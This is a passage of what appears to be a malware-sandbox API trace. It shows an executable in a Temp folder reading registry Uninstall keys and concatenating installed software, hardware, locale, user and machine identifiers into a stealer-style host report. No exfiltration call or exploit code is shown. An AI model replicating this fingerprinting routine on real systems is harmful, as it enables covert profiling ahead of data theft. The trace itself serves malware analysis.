16.0.4266.1001\nMicrosoft Excel MUI (English) 2016 16.0.4266.1001\nMicrosoft PowerPoint MUI (English) 2016 16.0.4266.1001\nMicrosoft Publisher MUI (English) 2016 16.0.4266.1001\nMicrosoft Outlook MUI (English) 2016 16.0.4266.1001\nMicrosoft Word MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Proofing Tools 2016 - English 16.0.4266.1001\nOutils de vérification linguistique 2016 de Microsoft Office - Français 16.0.4266.1001\nHerramientas de corrección de Microsoft Office 2016: español 16.0.4266.1001\nMicrosoft Office Proofing (English) 2016 16.0.4266.1001\nMicrosoft InfoPath MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Shared MUI (English) 2016 16.0.4266.1001\nMicrosoft DCF MUI (English) 2016 16.0.4266.1001\nMicrosoft OneNote MUI (English) 2016" [0175.938] RegQueryValueExA (in: hKey=0x354, lpValueName="DisplayVersion", lpReserved=0x0, lpType=0x1987e8, lpData=0x197bd4, lpcbData=0x197fd4*=0x400 | out: lpType=0x1987e8*=0x1, lpData="16.0.4266.1001", lpcbData=0x197fd4*=0xf) returned 0x0 [0175.938] lstrcatA (in: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001\nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Access MUI (English) 2016 16.0.4266.1001\nMicrosoft Excel MUI (English) 2016 16.0.4266.1001\nMicrosoft PowerPoint MUI (English) 2016 16.0.4266.1001\nMicrosoft Publisher MUI (English) 2016 16.0.4266.1001\nMicrosoft Outlook MUI (English) 2016 16.0.4266.1001\nMicrosoft Word MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Proofing Tools 2016 - English 16.0.4266.1001\nOutils de vérification linguistique 2016 de Microsoft Office - Français 16.0.4266.1001\nHerramientas de corrección de Microsoft Office 2016: español 16.0.4266.1001\nMicrosoft Office Proofing (English) 2016 16.0.4266.1001\nMicrosoft InfoPath MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Shared MUI (English) 2016 16.0.4266.1001\nMicrosoft DCF MUI (English) 2016 16.0.4266.1001\nMicrosoft OneNote MUI (English) 2016", lpString2=" " | out: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001\nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Access MUI (English) 2016 16.0.4266.1001\nMicrosoft Excel MUI (English) 2016 16.0.4266.1001\nMicrosoft PowerPoint MUI (English) 2016 16.0.4266.1001\nMicrosoft Publisher MUI (English) 2016 16.0.4266.1001\nMicrosoft Outlook MUI (English) 2016 16.0.4266.1001\nMicrosoft Word MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Proofing Tools 2016 - English 16.0.4266.1001\nOutils de vérification linguistique 2016 de Microsoft Office - Français 16.0.4266.1001\nHerramientas de corrección de Microsoft Office 2016: español 16.0.4266.1001\nMicrosoft Office Proofing (English) 2016 16.0.4266.1001\nMicrosoft InfoPath MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Shared MUI (English) 2016 16.0.4266.1001\nMicrosoft DCF MUI (English) 2016 16.0.4266.1001\nMicrosoft OneNote MUI (English) 2016 ") returned="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001\nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Access MUI (English) 2016 16.0.4266.1001\nMicrosoft Excel MUI (English) 2016 16.0.4266.1001\nMicrosoft PowerPoint MUI (English) 2016 16.0.4266.1001\nMicrosoft Publisher MUI (English) 2016 16.0.4266.1001\nMicrosoft Outlook MUI (English) 2016 16.0.4266.1001\nMicrosoft Word MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Proofing Tools 2016 - English 16.0.4266.1001\nOutils de vérification linguistique 2016 de Microsoft Office - Français 16.0.4266.1001\nHerramientas de corrección de Microsoft Office 2016: español 16.0.4266.1001\nMicrosoft Office Proofing (English) 2016 16.0.4266.1001\nMicrosoft InfoPath MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Shared MUI (English) 2016 16.0.4266.1001\nMicrosoft DCF MUI (English) 2016 16.0.4266.1001\nMicrosoft OneNote MUI (English) 2016 " [0175.938] lstrcatA (in: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001\nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Access MUI (English) 2016 16.0.4266.1001\nMicrosoft Excel MUI (English) 2016 16.0.4266.1001\nMicrosoft PowerPoint MUI (English) 2016 16.0.4266.1001\nMicrosoft Publisher MUI (English) 2016 16.0.4266.1001\nMicrosoft Outlook MUI (English) 2016 16.0.4266.1001\nMicrosoft Word MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Proofing Tools 2016 - English 16.0.4266.1001\nOutils de vérification linguistique 2016 de Microsoft Office - Français 16.0.4266.1001\nHerramientas de corrección de Microsoft Office 2016: español 16.0.4266.1001\nMicrosoft Office Proofing (English) 2016 16.0.4266.1001\nMicrosoft InfoPath MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Shared MUI (English) 2016 16.0.4266.1001\nMicrosoft DCF MUI (English) 2016 16.0.4266.1001\nMicrosoft OneNote MUI (English) 2016 ", lpString2="16.0.4266.1001" | out: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001\nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Access MUI (English) 2016 16.0.4266.1001\nMicrosoft Excel MUI (English) 2016 16.0.4266.1001\nMicrosoft PowerPoint MUI (English) 2016 16.0.4266.1001\nMicrosoft Publisher MUI (English) 2016 16.0.4266.1001\nMicrosoft Outlook MUI (English) 2016 16.0.4266.1001\nMicrosoft Word MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Proofing Tools 2016 - English 16.0.4266.1001\nOutils de vérification linguistique 2016 de Microsoft Office - Français 16.0.4266.1001\nHerramientas de corrección de Microsoft Office 2016: español 16.0.4266.1001\nMicrosoft Office Proofing (English) 2016 16.0.4266.1001\nMicrosoft InfoPath MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Shared MUI (English) 2016 16.0.4266.1001\nMicrosoft DCF MUI (English) 2016 16.0.4266.1001\nMicrosoft OneNote MUI (English) 2016 16.0.4266.1001") returned="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001\nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Access MUI (English) 2016 16.0.4266.1001\nMicrosoft Excel MUI (English) 2016 16.0.4266.1001\nMicrosoft PowerPoint MUI (English) 2016 16.0.4266.1001\nMicrosoft Publisher MUI (English) 2016 16.0.4266.1001\nMicrosoft Outlook MUI (English) 2016 16.0.4266.1001\nMicrosoft Word MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Proofing Tools 2016 - English 16.0.4266.1001\nOutils de vérification linguistique 2016 de Microsoft Office - Français 16.0.4266.1001\nHerramientas de corrección de Microsoft Office 2016: español 16.0.4266.1001\nMicrosoft Office Proofing (English) 2016 16.0.4266.1001\nMicrosoft InfoPath MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Shared MUI (English) 2016 16.0.4266.1001\nMicrosoft DCF MUI (English) 2016 16.0.4266.1001\nMicrosoft OneNote MUI (English) 2016 16.0.4266.1001" [0175.939] lstrcatA (in: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001\nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Access MUI (English) 2016 16.0.4266.1001\nMicrosoft Excel MUI (English) 2016 16.0.4266.1001\nMicrosoft PowerPoint MUI (English) 2016 16.0.4266.1001\nMicrosoft Publisher MUI (English) 2016 16.0.4266.1001\nMicrosoft Outlook MUI (English) 2016 16.0.4266.1001\nMicrosoft Word MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Proofing Tools 2016 - English 16.0.4266.1001\nOutils de vérification linguistique 2016 de Microsoft Office - Français 16.0.4266.1001\nHerramientas de corrección de Microsoft Office 2016: español 16.0.4266.1001\nMicrosoft Office Proofing (English) 2016 16.0.4266.1001\nMicrosoft InfoPath MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Shared MUI (English) 2016 16.0.4266.1001\nMicrosoft DCF MUI (English) 2016 16.0.4266.1001\nMicrosoft OneNote MUI (English) 2016 16.0.4266.1001", lpString2="\n" | out: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001\nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Access MUI (English) 2016 16.0.4266.1001\nMicrosoft Excel MUI (English) 2016 16.0.4266.1001\nMicrosoft PowerPoint MUI (English) 2016 16.0.4266.1001\nMicrosoft Publisher MUI (English) 2016 16.0.4266.1001\nMicrosoft Outlook MUI (English) 2016 16.0.4266.1001\nMicrosoft Word MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Proofing Tools 2016 - English 16.0.4266.1001\nOutils de vérification linguistique 2016 de Microsoft Office - Français 16.0.4266.1001\nHerramientas de corrección de Microsoft Office 2016: español 16.0.4266.1001\nMicrosoft Office Proofing (English) 2016 16.0.4266.1001\nMicrosoft InfoPath MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Shared MUI (English) 2016 16.0.4266.1001\nMicrosoft DCF MUI (English) 2016 16.0.4266.1001\nMicrosoft OneNote MUI (English) 2016 16.0.4266.1001\n") returned="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001\nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Access MUI (English) 2016 16.0.4266.1001\nMicrosoft Excel MUI (English) 2016 16.0.4266.1001\nMicrosoft PowerPoint MUI (English) 2016 16.0.4266.1001\nMicrosoft Publisher MUI (English) 2016 16.0.4266.1001\nMicrosoft Outlook MUI (English) 2016 16.0.4266.1001\nMicrosoft Word MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Proofing Tools 2016 - English 16.0.4266.1001\nOutils de vérification linguistique 2016 de Microsoft Office - Français 16.0.4266.1001\nHerramientas de corrección de Microsoft Office 2016: español 16.0.4266.1001\nMicrosoft Office Proofing (English) 2016 16.0.4266.1001\nMicrosoft InfoPath MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Shared MUI (English) 2016 16.0.4266.1001\nMicrosoft DCF MUI (English) 2016 16.0.4266.1001\nMicrosoft OneNote MUI (English) 2016 16.0.4266.1001\n" [0175.939] RegCloseKey (hKey=0x354) returned 0x0 [0175.939] RegEnumKeyExA (in: hKey=0x358, dwIndex=0x2e, lpName=0x1983e4, lpcchName=0x197fd4, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{90160000-00BA-0409-0000-0000000FF1CE}", lpcchName=0x197fd4, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0175.939] wsprintfA (in: param_1=0x197fe4, param_2="%s\\%s" | out: param_1="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\{90160000-00BA-0409-0000-0000000FF1CE}") returned 90 [0175.939] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\{90160000-00BA-0409-0000-0000000FF1CE}", ulOptions=0x0, samDesired=0x20019, phkResult=0x197fe0 | out: phkResult=0x197fe0*=0x354) returned 0x0 [0175.939] RegQueryValueExA (in: hKey=0x354, lpValueName="DisplayName", lpReserved=0x0, lpType=0x1987e8, lpData=0x197bd4, lpcbData=0x197fd4*=0x400 | out: lpType=0x1987e8*=0x1, lpData="Microsoft Groove MUI (English) 2016", lpcbData=0x197fd4*=0x24) returned 0x0 [0175.939] lstrlenA (lpString="Microsoft Groove MUI (English) 2016") returned 35 [0175.939] lstrcatA (in: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001\nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Access MUI (English) 2016 16.0.4266.1001\nMicrosoft Excel MUI (English) 2016 16.0.4266.1001\nMicrosoft PowerPoint MUI (English) 2016 16.0.4266.1001\nMicrosoft Publisher MUI (English) 2016 16.0.4266.1001\nMicrosoft Outlook MUI (English) 2016 16.0.4266.1001\nMicrosoft Word MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Proofing Tools 2016 - English 16.0.4266.1001\nOutils de vérification linguistique 2016 de Microsoft Office - Français 16.0.4266.1001\nHerramientas de corrección de Microsoft Office 2016: español 16.0.4266.1001\nMicrosoft Office Proofing (English) 2016 16.0.4266.1001\nMicrosoft InfoPath MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Shared MUI (English) 2016 16.0.4266.1001\nMicrosoft DCF MUI (English) 2016 16.0.4266.1001\nMicrosoft OneNote MUI (English) 2016 16.0.4266.1001\n", lpString2="Microsoft Groove MUI (English) 2016" | out: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001\nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Access MUI (English) 2016 16.0.4266.1001\nMicrosoft Excel MUI (English) 2016 16.0.4266.1001\nMicrosoft PowerPoint MUI (English) 2016 16.0.4266.1001\nMicrosoft Publisher MUI (English) 2016 16.0.4266.1001\nMicrosoft Outlook MUI (English) 2016 16.0.4266.1001\nMicrosoft Word MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Proofing Tools 2016 - English 16.0.4266.1001\nOutils de vérification linguistique 2016 de Microsoft Office - Français 16.0.4266.1001\nHerramientas de corrección de Microsoft Office 2016: español 16.0.4266.1001\nMicrosoft Office Proofing (English) 2016 16.0.4266.1001\nMicrosoft InfoPath MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Shared MUI (English) 2016 16.0.4266.1001\nMicrosoft DCF MUI (English) 2016 16.0.4266.1001\nMicrosoft OneNote MUI (English) 2016 16.0.4266.1001\nMicrosoft Groove MUI (English) 2016") returned="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: 